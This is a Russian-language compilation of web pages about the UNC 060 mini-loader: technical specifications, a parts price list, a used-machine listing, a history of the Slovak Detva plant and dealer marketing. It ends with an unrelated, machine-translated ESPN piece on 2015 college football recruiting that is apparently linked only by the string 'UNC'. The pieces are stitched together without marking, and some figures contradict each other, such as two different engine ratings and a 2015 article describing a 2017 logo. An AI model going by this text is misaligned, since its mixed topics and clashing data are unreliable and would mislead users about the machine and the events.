Характеристики Unc 060. Обзор мини-погрузчика Unc 060
- 1. Технические характеристики Унц 060
- 2. Габариты Unc 060
- 3. Отзывы Unc 060
- 4. Мощность
- 5. Навесное оборудование
- 6. Кабина
- 7. Управление
- 8. Аналоги
- 9. Видео
Руководство по ремонту и обслуживанию Unc 060. Часть 1
Руководство по ремонту и обслуживанию Unc 060. Часть 2
Источник фото: uralspecmash-td.ruТехнические характеристики Унц 060: масса — 3,7 т
Технические характеристики Унц 060
Основное предназначение мини-погрузчика Унц 060 — это погрузка, планировка и перемещение грунтов 1-4 класса, а также экскавация, бурение ям (породы 1-2 класса), рытье узких траншей. Разберем подробнее технические характеристики Unc 060.
Максимальная скорость движения вперед | 12 км/ч |
Сила тяги | 24 кН |
Диаметр поворота по наружной колее | 2,4 м |
Диаметр поворота по наружному габариту | 4,8 м |
Глубина преодолеваемого брода | 250 мм |
Продолжительность рабочего цикла | 12 сек |
Производительность | 120 т/ч |
Номинальная грузоподъемность | 750 кг |
Эксплуатационная масса | 2,95 т |
Полная масса | 3,7 т |
Мини-погрузчик Unc 060 имеет гидростатический привод. Трансмиссия представляет собой привод насосов, преобразователи «Сауэр», четыре независимых колеса и два механических редуктора с цилиндрическими шестернями. Рулевое управление — механическое, колеса притормаживают за счет изменения угла наклона регулировочной плиты гидронасоса СВП. Тормозная система представлена педалью управления и перепускным клапаном, стояночным и аварийным тормозами.
Габариты Unc 060
Ширина с колесами 10-15 | 1,7 м |
Длина | 3,22 м |
Высота с кабиной | 1,99 м |
Колесная база | 1,02 м |
Ширина колес с шинами 10-15 | 1,43 м |
Максимальный горизонтальный вылет стрелы | 1,35 м |
Ширина ковша | 1,73 м |
Максимальная высота погрузчика с поднятым ковшом | 3,38 м |
Дорожный просвет с шинами 10-15 | 186 мм |
Объем основного ковша | 0,45 м3 |
Источник фото: rutube. ruГабариты Унц 060: высота с кабиной — 1,99 м
Отзывы Unc 060
Отзывы Unc 060 от пользователей, а также вопросы ремонта можно почитать в этой теме Форума.
Мощность
Мини-погрузчики Unc 060 оборудованы дизельными четырехтактными силовыми установками Zetor 5201 с водяным охлаждением и непосредственным впрыском топлива. Двигатель развивает мощность в 45 л.с. (33,1 кВт). Система водяного охлаждения с принудительной циркуляцией регулируется термостатом.
Модель двигателя | Зетор 5201 |
Диаметр цилиндра | 102 мм |
Ход поршня | 110 мм |
Степень сжатия | 17 |
Количество цилиндров | 3 |
Рабочий объем цилиндров | 2 696 см3 |
Номинальная мощность при 1 200 об/мин | 33,1 кВт |
Удельный расход топлива | 236 г/кВт*ч |
Число оборотов холостого хода | 600+50 об/мин |
Средняя скорость поршня | 8,7 м/с |
Сухая масса двигателя | 336 кг |
Объем топливного бака | 50 л |
Навесное оборудование
Навесная система состоит из коробчатой сварной стрелы, гидроцилиндров и быстрозажимного устройства. Подъемный механизм прикреплен к задней части рамы шарнирно. Погрузчик можно оснастить, помимо основного ковша, буром, грейфером, вилами с захватом, дренажным, комбинированным и обратным ковшами, шарнирно-закрепленным отвалом и др.
Источник фото: forum.exkavator.ruФото мини-погрузчика Unc 060
Кабина
Кабина соответствует стандарту ROPS. Она может подниматься и опрокидываться, поэтому ко всем узлам обеспечен доступ. В кабине установлено кресло с двухточечным ремнем безопасности, а также отопитель 3В3, который функционирует от системы охлаждения ДВС.
Управление
Все манипуляции с погрузочным ковшом осуществляются при помощи рычажного механизма, который находится в кабине. Каждый рычаг, управляемый посредством гидрораспределителей совмещенного действия, имеет 4 положения. Рычаги автоматически возвращаются в нейтральное положение, после того как оператор их отпускает.
Аналоги
К аналогам данной машины можно отнести следующие модели:
Видео
youtube.com/embed/vLuftukbWa0″>Видео с канала «Федор Баркун»
UNC-060, UNC-061, LOCUST 750 – Конкорд
273 125 010 540 Патрубок радиатора верхний
273125010540
400
273 238 401 047 Патрубок радиатора нижний
273238401047
300
Cервоклапан ORSTA
Н/Д
—
Амортизатор 533-0-62-07-126-1К
533-0-62-07-126-1К
350
Амортизатор передней подвески 533-0-62-07-079-1к
533-0-62-07-079-1К
500
Вал входной УНЦ 060
Н/Д
11000
Вал первичный УНЦ 060
Н/Д
2100
Венец маховика UNC 060
Н/Д
5800
Венец маховика в сборе с маховиком
Н/Д
18000
531 900 951 344
3500
Винт (болт) 533-0-34-09-090-1к на вал входной
Н/Д
200
Вкладыши коренные 50110093 стандарт
50110093
4500
Вкладыши коренные Р1 50110083
50110083
4500
Вкладыши коренные Р2 50110081
50110081
4500
Вкладыши шатуна 50110094 стандарт
50110094
3600
Вкладыши шатунные Р1 50110084
50110084
3600
Вкладыши шатунные Р2 50110082
50110082
3600
Водяной насос (помпа) + шкив 69010652 / 69010651
69010652
120000
Водяной насос (помпа) 6901 0661, 6201 0615 ZETOR 5201, 7201
62010615
10000
Впрыскивающая трубка 7001 0894, 7001 0896, 7001 0897
7001 0894
600
Впрыскивающий комплект / ТНВД PP3M85K1e-3095
PP3M85K1e-3095
90000
Впрыскивающий комплект / ТНВД PP3M85K1e-3143
PP3M85K1e-3143
89000
Втулка шатуна 950311
950311
1500
Выключающий рычаг (лапка сцепления) 55011106
55011106
400
Выпускной коллектор УНЦ
Н/Д
3500
ГБЦ головка блока 4901 0554, 6901 0552, 7101 0504
7101 0501
18000
49010551
18000
Генератор 44311351630
44311351630
6500
Генератор ZETOR 93 9950
Н/Д
6500
Гидромотор SMF 20
SMF 20
90000
Гидромотор МПА-33 аксиально-поршневой
мпа-33
90000
Гидронасос / гидрогенератор SPV-20
SPV-20
175000
Гидронасос 533-9-62-19-917-1К
533-9-62-19-917-1К
21900
Гидронасос НПА-33
НПА-33
150000
Гидроцилиндр УНЦ 060
Н/Д
14000
Двигатель Zetor 5201 в сборе
Н/Д
—
Диск внутренний 533. 0.34.09.310-1к
533-0-34-09-310-1к
1000
Диск колеса УНЦ 060
Н/Д
4000
Диск наружный 533.0.34.09.311-1к
533-0-34-09-311-1к
1000
Диск сцепления ведомый 533-9-62-20-006-1к стар. обр.
533.9.62.20.006-1к
4000
Клапан всасывающий 6901 0555
6901 0555
1200
Клапан выхлопной 6901 0554
69010554
1200
Клапан предохранительный 533934197282
533934197282
5800
950521
1800
Колено передаточное 443449015030
443449015030
950
Коленчатый вал / коленвал Zetor
3001 0399
36000
Кольцо поршневое 102 6901037578
6901037578
1000
Комплект прокладок двигателя 089411390
089411390
7500
Комплект трубок ТНВД
Н/Д
—
Коромысло всасыв. клап. комп. 6901-0566
69010566
1800
Коромысло выхлоп. клап. комп. 6901 0565
69010565
1800
Кулачковый вал 4001 0401, 4904 0411
4904 0411
7500
Манжета 688-12 сб 53
688-12сб53
300
Мокрая гильза 6901 0168 (69010168)
Н/Д
2000
Направитель клапана 69010567
69010567
750
Насос U32L
Н/Д
17000
Насос А72 ХТМ / А084 ХТМ (УНЦ)
336142801720
50000
Насос масляный 4901-0732
49010732
12000
Насос ручной подкачки CD1M 2278, CD1M 2291, ТННД 9300 9200
9300 9200
3600
Насос ТНВД вспрыскивающий (топливный) UNC 060 Motor Pal
Н/Д
89000
Насос топливоподкачивающий ручной
990 3554
2300
Отвод топлива 5001 0881
5001 0881
1500
Палец 533. 0.62.43.099-1к
Н/Д
800
Плунжерная пара ЕМ85Ке-14 930523
930523
6000
Подшипник коленвала 6304
Н/Д
—
Поршень 7201 0303, поршневой палец 6701 0332, стопорное кольцо «35» 97 0288
Н/Д
1000
Поршневая группа Zetor 5201/7201 Z-70028 7011.0099 / 5211.0099
52110099
7500
Поршневая группа в сборе 6901 0018
69010018
7500
Поршневое кольцо 102 мм. (6901 0381, 6901 0095, 7101 0304, 6901 0380, 5011 0096, 5211 0096)
Н/Д
1000
Прокладка головки блока 6901 0571
6901 0571
600
Пружина всасывающего клапана 950507
950507
250
Пружина выпускного клапана 950508
950508
250
Радиатор водяной UNC 060, UNC 061
Н/Д
16000
Радиатор масляный УНЦ
Н/Д
36000
Распылитель RS 16 D3
Н/Д
43000
Регулятор генератора Magneton
443116419070
1500
Реле стартера РСП-1 М-114
1500
Реле стартера 9142722 123704003
Н/Д
2500
Рем. комплект водяного насоса УНЦ
Н/Д
2200
Рем. комплект двигателя Zetor 5201 089411390
Н/Д
7500
Ремень генератора B-1180 IV ХЛ
B-1180 IV ХЛ
750
Ремень клиновой В-17 1180Lw-1140Li
17х1120 Li 97-4311
750
Ремкомплект водяного насоса (помпы) 6711 0098 (67110098, 2011 7045)
Н/Д
2200
Ремкомплект водяного насоса 950056
950056
2200
Ремкомплект гидроцилиндра UNC (УНЦ)
Н/Д
1200
Рукав 5501 1312 «воронка»
5501 1312
500
Сальник коленвала задний 120х140х15
55010221
600
Сальник коленвала передний 52х72х12 974240
974240
390
Сопло DOP 160 S 430-1436
443978581436
900
Стартер 6711 5711 редукторный 93 3253
93 3253
15000
Стартер NEW Magneton 9142722
9142722
15000
Стекло лобовое (триплекс) УНЦ
Н/Д
2700
Сцепление 7745 1176
7745 1176
—
Сцепление для УНЦ 060
Н/Д
50000
Термостат 6901 1348
6901 1348
1000
Термостат TR10
TR10
1700
Трос газа для UNC-060, UNC-061
Н/Д
1000
Трос сцепления для UNC-060, UNC-061
Н/Д
1000
Трос управления для UNC-060, UNC-061
Н/Д
1300
Трубка 1 цилиндра 7001-0894
Н/Д
—
Ковшовый мини-погрузчик UNC 060 на гарантии после капремонта
- Мини Погрузчики
- Другой
1543 Алтайский край
₽ 575 000
3285 18 февраля 2015 в 13:58 (до 19. 01.2038) Sergej-pro
- Цена: ₽ 575 000
- Адрес: г. Барнаул
- E-mail: kruglyak76@mail.
ru
Написать автору Телефон Добавить в блокнот
Ковшовый мини-погрузчик UNC 060, 1995 г.в. с пробегом по России.
После капремонта, на гарантии, восстановлен полностью.
Двигатель дизельный, объем 3000 см3.
Наработка 5 м.ч.
Объём ковша 0,20 м3.
Вес погрузчика 3 т.
Тэги: unc
Похожие объявления- Продается вилочный мини-погрузчик ₽ 300 000
- Колесный мини-погрузчик WECAN -GM650 “H”, фронтальный ₽1 036 000
- Фронтальный погрузчик Sakai L4, полноприводный, без пробега по РФ ₽ 380 000
- Фронтальный минипогрузчик БАРС, 1994 г.
в. ₽ 320 000
- Мини погрузчик Daewoo DSL802 бу продажа ₽ 450 000
Комментарии
Комментариев к записи нет. Вы можете стать первым!
Добавить комментарий
Оставлять комментарии могут только зарегистрированные пользователи!
Легендарная спецтехника завода PPS GROUP A.S. (DETVA) из ЧССР в СССР
16.12.2010 #DETVA
Легендарная спецтехника завода PPS GROUP A.
Завод PPS Detva хорошо известен российским потребителям специальной автомобильной техники. Завод поставляет качественную и надежную технику на российский рынок на протяжении последних 40 лет. Погрузчики марки Detva UNC-200, UNO-180, UN-053, UNC-060, UNC-061 в своей деятельности используют такие известные компании, как «Норильский Никель», дочерние компании Газпрома и Лукойла, компании «Русский Алюминий» и «АвтоВаз».
PPS Group A.S. — это компания с традицией более 50 лет в машиностроении. В настоящее время в компании работает более 1500 человек, которые обладают сильным потенциалом и профессионализмом.
Основа стратегической программы ориентирована на производство тяжелых металлических конструкций для сельскохозяйственной, строительной, горнодобывающей и других машин, и на сборку готовой продукции.
PPS Group A.S. управляет своими бизнес-процессами с динамикой, эффективностью и надежностью, чтобы достичь высокой оценки удовлетворенности клиентов. Значительные инвестиции в новые технологии и в техническое оборудование производятся на регулярной основе в целях обеспечения роста производства.
Сочетание современных технологий и человеческого потенциала дает сильные и конкурентоспособные позиции на европейском рынке.
Компания гарантирует стабильное качество своей продукции в соответствии с системой управления качеством ISO 9001:2001 и системой качества сварки STN EN 3834-2, DIN 15 018, DIN 4132.
История развития завода PPS Group A.S.: Первый камень компании был заложен в 1950 году. Завод впервые был интегрирован в национальное предприятие Tatra Koprivnice, а затем в завод В.И. Ленина в Пльзене. В соответствии с Законом Министерства машиностроения от 1 января 1955 г. национальное предприятие было создано под названием Поляна Strojarne и зарегистрированно в Детва. |
Производство началось во втором квартале 1954 года. Производство оборудования для танков сформировало основу для производства специального оборудования. В 1958 году предприятие начало развитие и конструкторского бюро, из которого вышло два экскаватора: D 031k и его второй вариант D 033A, построеный на шасси грузовиков TATRA. Производство БТР OT 810 ознаменовало новую эру в области специального оборудования. 1960 год ознаменовал собой запуск производства одной из наиболее широко выпускаемых продукций в истории нашего предприятия: HON — из серии гидравлических полуповоротных погрузчиков. Базовая модель HON 050 была изменена с HON 051 на HON 053 и выпускалась до 1974 года. |
Базовая модель HON 050 В 1962 году началось производство специального оборудования — телескопических экскаваторов Satur 035 K. |
В 1970 году была введена новая модель погрузчика UNC 151. Погрузчик был разработан и изготовлен предприятием от А до Я. В этот период производство гусеничных БТР БВП-1 началось в специальном отделе, который в то время представлял вершину в мире БМП транспортных средств. В сотрудничестве с научно-исследовательским институтом в городе Зволен, началось производство погрузчиков UN-050 в 1974 году. Погрузчик, названный UN-053, выпускался в различных модификациях до 1995 года. Продажа этого продукта достигнуто 30000 единиц, что является уникальным в сегменте строительной техники. |
Две наиболее популярные машины в истории PPS Detva — это UN-050 и UN-053. Эти машины из-за своей простоты, надежности и долговечности получили признание почти по всему миру. Количество выпущенных погрузчиков — более 30000 штук, что говорит само за себя.
Погрузчики UN-050 и UN-053 вы найдете в Тунисе, Ираке, Китае, Кубе и во многих других странах. Однако большинство погрузчиков было экспортировано в страны СССР и Российскую Федерацию. Машины в СССР оказались на территории от Северного полярного круга до пустыни Гоби. Надежный двигатель Zetor, стабильные гидравлические системы Sauer и, особенно, радиус поворота стрелы 180° сделали из этого необыкновенного куска металла машину, которая с гордостью представляла марку Detvan.
История механизма UN началась в 70-ые годы, когда завод Поляна Strojarne получает задание разработать наследника легендарного Honau. Задача была непростая, потому что придумать что-то еще лучше представлялось очень сложным. Но в итоге наградой за труды конструкторов была врученная им золотая медаль в Брно в 1972 году. UN-050 был сразу же размещен в первом классе качества, как и все другие машины завода. Погрузчики UN-050 вдруг стали самыми популярными машинами для экспорта. С этой машиной объем экспорта значительно вырос. Уже в 1978 году в присутствии всех должностных лиц и членов Коммунистической партии было принято решение о поставке 10000 погрузчиков UN-050 для СССР.
За время производства разрабатывались и производились новые дополнения устройства, изготовленные на новом заводе Крупина. Но даже эта машина была не без недостатков. Кабина была постоянно прикреплена к раме. Серьезным недостатком был треск в раме поворота. Все эти недостатки устранились в погрузчике UN-053. Кабина была смонтирована на раме с помощью болтов-булавок, и, наконец, открылся доступ к задним колесам. Произведено два варианта: UN-053.1 и UN-053.2. Производство продолжалось до 1998 года. Это легендарная машина по-прежнему является очень популярным помощником в каждой из областей экономики и там, где необходима достойная спецтехника, простота обслуживания и неустанная работа — главные преимущества погрузчика UN-053.
Производство большого погрузчика UNC-200 началось в 1980 году. После различных модификаций погрузчик производили до 1998 года под названием UNC-201. В том же году компания начала разработку нового ассортимента продукции: промышленные роботы, сварочные манипуляторы. 1989 год характеризуется тем, что завод начинает сотрудничать с престижными международными компаниями. Соглашение о сотрудничестве было подписано с Hanomag AG (г. Ганновер, Германия) о производстве и поставке стальных конструкций. В 1990 году лицензионное соглашение о производстве и поставке автопогрузчиков было подписано с итальянской компанией Cesab Спа Болонья. Кроме того, была создана Ассоциация с американской компанией Население, Солт-Лейк-Сити UT по разработке новой серии погрузчиков CET. |
С 1991 по 1996 годы были внесены существенные изменения в производственную программу предприятия:
|
Период 1996 — 2001 гг. характеризуют долгосрочные отношения с авторитетными международными партнерами в контексте перехода от вооружения к производству гражданской продукции: Komatsu Hanomag — Германия, Komatsu Utility Европы — Италии, Volvo — Швеция, Volvo — Германия, Karosa — Чешская Республика, Cesab — Италия. В 1996 году государственное предприятие PPS Detva было преобразовано в акционерное общество как PPS Detva, а затем постепенно интегрировались в ДМД холдинг.
В связи с неустойчивой деловой политикой и текущими проблемами, связанными с преобразованием отдела специальных продуктов, головная компания PPS Detva стала финансово несостоятельной. В 1997 году она была преобразована в PPS Holding AS, который продолжает производственную программу своего предшественника. Однако отсутствие гибкости в ответ на кризис строительной отрасли в Европе и косвенная стагнация продаж строительного оборудования и машин привели PPS Detva как холдинг к экономическим трудностям. По постановлению районного суда в Банска-Бистрица от 9 мая 2002 г. PPS Detva Holding был объявлен банкротом. Однако после вынесения судебного решения о банкротстве компания не прекращала, а продолжала производство, а также продажу широкого ассортимента продукции. Компания функционировала под названием «PPS Detva» как обанкроченный холдинг.
В июне 2003 года компания PPS Detva Holding A.S. была приобретена группой инвесторов из Швейцарии, Ситно холдинг (Братислава) и инвестиционной компанией Odien/Sevis reeng (Братислава).
С этого времени PPS Group A.S. начинает новую эпоху в своей истории. И ставит перед собой четкие стратегические цели: адаптироваться к требованиям глобальной торговли и стать стратегическим поставщиком агрегатов, запасных частей и узлов для всего международного маркой производители строительной техники и другого тяжелого оборудования.
Универсальные фронтальные мини погрузчики с бортовым поворотом завода PPS Group A.S. (Detva):
Запчасти на весь модельный ряд мини погрузчиков UNC-060/061 и др. , производимых Словацким заводом «PPS DETVA», всегда есть на складах нашей группы компаний. В нашем автомагазине «Страна Автозапчастей» работает специализированный отдел по развитию данного направления. Бренд UNC хорошо известен российским потребителям благодаря безупречной работе, сравнительно недорогим запасным частям к UNC-060/061 и расходным материалам, высоким качеством сервисного обслуживания.
Универсальные фронтальные мини погрузчики UNC-060 (УНЦ-060), DETVAN UNC-061 (УНЦ-061) LOCUST-750 (Локуст-750) предназначены для выполнения земляных работ, прежде всего для погрузки, перемещения и планировки пород всех классов, рытья узких траншей, бурения ям, уборки снега. Широкий выбор сменного навесного оборудования значительно расширяет возможности применения погрузчиков марки UNC-060. (А так же большой выбор запчастей делает этот модельный ряд очень выгодным).
Привод движения мини погрузчиков УНЦ-060 (UNC-060) гидростатический, состоящий из гидрогенераторов SAUER SPV-20 и гидромоторов SAUER SMF-20. Приводным агрегатом является дизельный двигатель ZETOR-5201. Управление движением погрузчика и работа рабочего оборудования — гидравлические и осуществляются с помощью джойстиков ORSTA. Поворот погрузчика UNC-060 осуществляется за счёт различной скорости вращения отдельных пар колес. Кабина безопасного типа, простая система управления погрузчиком, расположение органов управления и контрольно-измерительных приборов удобно в обслуживании.
Высокая манёвренность УНЦ-060 положительно отражается на работе оператора, что обеспечивает высокую производительность погрузчика. Принимая во внимание потребности заказчиков, производителем был разработан погрузчик УНЦ-061 (UNC-061) с возможностью управления передвижением одной левой рукой и управления рабочим оборудованием правой рукой, что позволяет более рационально использовать рабочее время.
Грузоподъёмность мини погрузчика УНЦ-061 увеличилась до 800 килограмм.
Дизельный двигатель ZETOR-5201 имеет широкое применение как источник энергии в мини-погрузчиках МКСМ-800, UNC-060, UNC-061, LOCUST-750, DESTA, BOBEK-761 и фронтальных погрузчиках UN-053,UNC-200, UNC-201, UNK-320, UDS-114, LKT-81 благодаря высокой надежности. Дизельный двигатель ЗЕТОР обладает высоким термическим КПД, поэтому отличается высокой экономичностью. В выхлопных газах дизельного двигателя ZETOR содержится низкий процент углеводородов и окислов углерода. Такие характеристики двигателя ZETOR делают его хорошей альтернативой по сравнению с другими марками дизельных двигателей.
Универсальный поворотный погрузчик UN-053, UNO-180, UZS-050 является эксклюзивным в своём роде погрузчиком, имеющим возможность поворота рабочего оборудования на 90 градусов от продольной оси, что позволяет сократить цикл погрузочно-разгрузочных работ. УН-053 (UN-053), УНО-180 (UNO-180) сконструирован так, что, кроме основного рабочего ковша, который поставляется с погрузчиком, имеется большой выбор навесного оборудования, применение которого повышает универсальность фронтального погрузчика.
Основную часть машины UN-053 представляет рама сварной конструкции. На задней части рамы установлен дизельный двигатель Zetor-7201, образующий один монтажный комплект вместе с приводом насосов, гидравлическими насосами SAUER SPV-22, SMF-22, U 80/32 L и воздушным фильтром. В передней части погрузчика UNO-180, UN-053 установлено рабочее оборудование, состоящее из рабочего инструмента, быстродействующего зажима рычажной передачи, стрелы и гидроцилиндров.
В средней части рамы фронтального погрузчика УН-053, УНО-180 находится кабина безопасности «ROPS» с возможностью установки конструкции «FOPS», коробка передач с гидравлическим мотором SMF-22 ходовой части, соединительными валами для привода осей и распределителями RS 20 D3, RS 16 D 1 рабочего оборудования.
Универсальный фронтальный погрузчик UNC-200, UNC-201, UNK-320 предназначен для земляных работ, главным образом для выемки, погрузки и транспортирования горных пород 1-5 категорий. Погрузчики УНЦ-200, УНЦ-201, УНК-320 также можно использовать для разработки горных пород, при манипуляции зернистыми промышленными материалами и сельскохозяйственными продуктами объёмной массой до 1600 кг/м3. Эксплуатация фронтальных погрузчиков UNC-200, UNC-201, UNK-320 допускается при атмосферной температуре в пределах от -15 до +37°С. Универсальность погрузчиков УНЦ-201 обеспечивается за счёт применения сменного навесного оборудования: карьерный ковш, двухчелюстной ковш, ковш для лёгких материалов, вилочный захват для брёвен, крупнообъёмный ковш ёмкостью 6.75 м3. Каждый потребитель строительной техники UNC-201, UNC-200 UNK-320 знает, что своевременное техническое обслуживание и использование оригинальных запасных частей помогает обеспечить длительный срок службы погрузчика УНЦ-200, его экономичную эксплуатацию и предупредить зачастую излишние дефекты и травмы.
Наша компания предлагает только оригинальные запасные части для фронтальных погрузчиков.
#Стойка стабилизатора Nissan
Стойка стабилизатора Nissan: основа поперечной устойчивости «японцев»
22.06.2022 | Статьи о запасных частях
Ходовая часть многих японских автомобилей Nissan оснащается стабилизатором поперечной устойчивости раздельного типа, соединенным с деталями подвески двумя отдельными стойками (тягами). Все о стойках стабилизатора Nissan, их типах и конструкции, а также о подборе и ремонте — читайте в данной статье.
#Ремень приводной клиновой
Ремень приводной клиновой: надежный привод агрегатов и оборудования
15.06.2022 | Статьи о запасных частях
Для привода агрегатов двигателя и в трансмиссиях различного оборудования широко применяются передачи на основе резиновых клиновых ремней. Все о приводных клиновых ремнях, их существующих типах, особенностях конструкции и характеристиках, а также о правильном выборе и замене ремней — читайте в статье.
Барабан тормозной ГАЗ: управляемость и безопасность горьковских автомобилей
08.06.2022 | Статьи о запасных частях
Тормозные системы большинства ранних и актуальных моделей автомобилей ГАЗ оснащаются колесными механизмами барабанного типа. Все о тормозных барабанах ГАЗ, их существующих типах, конструктивных особенностях и характеристиках, а также о выборе, замене и обслуживании данных деталей — читайте в статье.
#Палец поршневой
Палец поршневой: прочная связь поршня и шатуна
02.02.2022 | Статьи о запасных частях
В любом поршневом двигателе внутреннего сгорания присутствует деталь, соединяющая поршень с верхней головкой шатуна — поршневой палец. Все о поршневых пальцах, их конструктивных особенностях и способах установки, а также о верном подборе и замене пальцев различных типов подробно рассказано в статье.
Вернуться к списку статей
Погрузчик UNC 060 (УНЦ 060)
Главная Погрузчики Погрузчик UNC 060…
Технические данные УНЦ-060
Двигатель
Модель | Zetor 5201 |
Вид | Четырехтактный дизель с непосредственным впрыском топлива, водяного охлаждения |
Диаметр цилиндра, мм | 102 |
Ход поршня, мм | 110 |
Степень сжатия | 17 |
Число цилиндров | 3 |
Рабочий объем цилиндров, см3 | 2696 |
Номинальная мощность при 2200 об/мин, квт | 34,2 |
Расход топлива, г/квт. | 250 |
Число оборотов холостого хода, об/мин | 450 |
Средняя скорость поршня, м/с | 8,07 |
Сухая масса двигателя, кг | 325 |
Порядок работы цилиндров | 1-3-2 |
Емкость масла, л | 9 |
Максимальная температура воды, С | 105 |
Рабочая температура воды, С | 80-95 |
Допустимый продольный наклон, град | 20 |
Допустимый поперечный наклон, град | 35 |
Трансмиссия
Редуктор |
|
Вид | Механический, цилиндрические шестерни |
Число | 1-1 |
Масса, кг | 169 каждый |
Емкость масла, л | 8 |
Привод насосов |
|
Вид | Механический редуктор, отключаемый с помощью муфты с гидравлическим привом. |
Масса, кг | 90 |
Гидравлические преобразователи |
|
Насос (2шт) | SPV-20 |
Гидромотор (2шт) | SMF-20 |
Масса SPV/SMF, кг | 45/30 |
Рабочее давление, МПа | 35 |
Давление в контуре подпитки ГП, МПа | 1,3 |
Рабочая температура, С макс. | 80 |
Улавливающая способность масляного фильтра, микрометров | 10 |
Допускаемое макс. Разрежение на впуске, кПа | 24,5 |
Шины |
|
Число, шт | 4 |
Размер | 10,0 -15 |
Давление воздуха в шинах, Мпа | 0,392 |
Ездовые свойства |
|
Максимальная скорость, км/ч | 12 |
Сила тяги, кН | 24 |
Радиус поворота, м | 2,4 |
Преодолеваемый подъем, град | 20 |
Масса и нагрузки |
|
Масса в снаряженном состоянии эксплуатационная, кг | 2875 |
Нагрузка на передние колеса, кг на задние колеса, кг |
980 кг 1695 |
Габариты |
|
Длина погрузчика, мм | 3220 |
Высота по кабину, мм | 1990 |
Ширина, мм | 1700 |
Просвет, мм | 186 |
Колея колес, мм | 1435 |
База, мм | 1020 |
Ширина ковша, мм | 1730 |
Привод погрузчика UNC 060 – гидростатический. Силовым агрегатом служит двигатель Zetor 5201, мощность которого гарантирует динамичность работы погрузчика. Трансмиссия состоит из привода насосов, редукторов и четырех самостоятельно закрепленных ходовых колес.
Управление движением погрузчика и работа рабочего оборудования сосредоточено на два рычага управления, с помощью которых приводятся сервоклапаны управления (ORSTA или BARDEJOV). Поворот погрузчика осуществляется за счет различной скорости вращения отдельных пар колес.
Гидравлическая система трехконтурная и надежно обеспечивает работу погрузчика.
Простая система управления погрузчиком, удобное расположение органов управления и контрольно-измерительных приборов, удобное обслуживание, положительно отражаются на работе оператора.
Рама погрузчика УНЦ-060 (UNC 060) образует несущую часть агрегатов, которые сгруппированы в более крупные монтажные узлы. В задней части рамы установлен двигатель Zetor 5201, который с приводом насосов и насосами (SPV 20, А72XTM) образуют один монтажный узел. Гидравлические радиатор и радиатор системы охлаждения двигателя расположены перед двигателем. Топливный бак установлен с правой стороны двигателя, внутри рамы. Гидравлический бак, в котором встроен фильтр (а) рабочей жидкости, располагается с левой стороны двигателя, внутри рамы. Распределитель RS16D3 находится под радиаторами.
Двигатель Zetor 5201 – четырехтактный дизель, водяного охлаждения с непосредственным впрыском топлива. Блок коленчатого вала отлит из серого чугуна. Головка для каждого цилиндра самостоятельная. Гильзы –сменные. Система охлаждения жидкостная, с принудительной циркуляцией. Система газораспределения верхнеклапанная, с толкающими штангами. Смазка, циркуляционная, с масляной ванной, погрузчик УНЦ-060 UNC 060 имеет двухступенчатый масляный фильтр.
Наша компания занимается поставкой запасных частей к погрузчикам UNC 060 UNC 061, большой выбор запасных частей.
фото каталог каталог запасных частей UNC-060. pdf
Заказать запасные части
Завершение набора на выходных ACC: UNC загружается в DL, Майами реагирует на реакцию — On The Trail
- NFL Rumor Central
- NBA Rumor Central
- MLB Rumor Central
- Слухи о студенческом футболе
- Слухи о студенческом баскетболе
Choose Blog…
- Электронная почта
27 октября 2015 г.
- печать
Нет лучшего описания выходных, которые были на вербовочном пути ACC, чем столпотворение. В то время как Северная Каролина спокойно занималась своими делами, добавляя ключевой элемент в класс по защите, дела вокруг увольнения Эла Голдена в Майами были довольно хаотичными, и это даже повлияло на штат Флорида. теперь можно было отправиться в Алабаму. Том Хаук для студенческого спорта
Самое большое обязательство: Защитный отбор Марлона Данлэпа в Северную Каролину. Tar Heels потихоньку готовят класс в Чапел-Хилл, и в воскресенье Ларри Федора и его сотрудники приняли очень важное обязательство от Данлэпа. Защитный снаряд ростом 6 футов 4 дюйма и весом 290 фунтов привносит дополнительный размер и атлетизм в оборону координатора Джина Чизика. Данлэп присоединяется к старшему игроку Томону Фоксу, потенциально способному создать разницу в конце, и четырехзвездному тэклу Кайри Кэмпбеллу в качестве лучших словесных защитников в классе. Следующей задачей персонала является сохранение Фокса в гуще событий, вероятны официальные визиты на соревнования.
Крупнейшее списание: Четырехзвездочный ресивер Аммон Ричардс из Майами (Флорида). В любом случае это вело к отмене обязательств, с запланированными визитами в Алабаму и Оберн, но увольнение Эла Голдена формально открыло дверь для гладкого, как шелк, получателя, чтобы продолжить и возобновить свою вербовку.
pic.twitter.com/rCKdhjOZhw
— AR15 (@AhmmonR2) 25 октября 2015 г.
Нет никаких сомнений в том, что Алабама теперь команда, которую нужно победить, и задачей нового персонала «Харрикейнз» будет быстрое налаживание отношений с Ричардсом и его матерью. Младший брат Ричардса, Марк-Энтони Ричардс, является стартовым университетским игроком, возвращающимся в Веллингтон Хай, и отъезд Аммона в Алабаму может затруднить путешествие для семьи — в любом случае, это может стать рекламным ходом для нового персонала в Корал-Гейблс.
Самый впечатляющий визит: Внешний полузащитник ESPN Junior 300 Вандариус Коуэн совершил короткую поездку в Майами на выходных, чтобы проверить «Харрикейнз».
😈🙌🏾 pic.twitter.com/cVLEm8NqNM
— Loco Ocho #8 (@vandarius98) 25 октября 2015 г.
Мало того, что Коуэн удалился из штата Флорида в Твиттере в какой-то момент в воскресенье (этот твит с тех пор был удален ), но похоже, что Коуэн сделает публичное обязательство перед ураганами в воскресенье после того, как изменит свой фон в Твиттере на логотип, который Майами использовал в 2017 году.
Новый фон на странице #ESPNJr300 OLB @vandarius98 -> -> pic.twitter.com/tKYxW6tyDe
— Джерри Гамильтон (@HamiltonESPN) 25 октября 2015 г.
Однако вскоре этот фон был удален. Коуэн все еще был в кампусе в Корал-Гейблс в воскресенье, и вполне возможно, когда сотрудники узнали, что Эл Голден был уволен.
Самый большой вопрос: Будет ли новый тренер Майами (Флорида) держать тренера приемников Кевина Бирда? Берд очень популярен благодаря обязательствам и перспективам, и это особенно касается динамичного плеймейкера ESPN 300 Сэма Брюса, у которого давние отношения с Бердом.
Пока КБ есть, я там.
— 6-3 (@_QUICK6) 26 октября 2015 г.
В течение многих месяцев у «Харрикейнз» была потрясающая группа приемников. Возможность для нового главного тренера подписать контракты с Брюсом, Ричардсом и Дионте Маллинсом будет огромной с точки зрения восприятия.
- Электронная почта
- Условия использования
- Политика конфиденциальности
- Реклама на основе интересов
- Права ЕС на конфиденциальность
- Политика в отношении файлов cookie
- Управление настройками конфиденциальности
© ESPN Enterprises, Inc. Все права защищены.
Покрытие UNC
Покрытие UNCВсе активы, связанные с тегом: UNC
Вдохновение: влияние учителя длится вечно
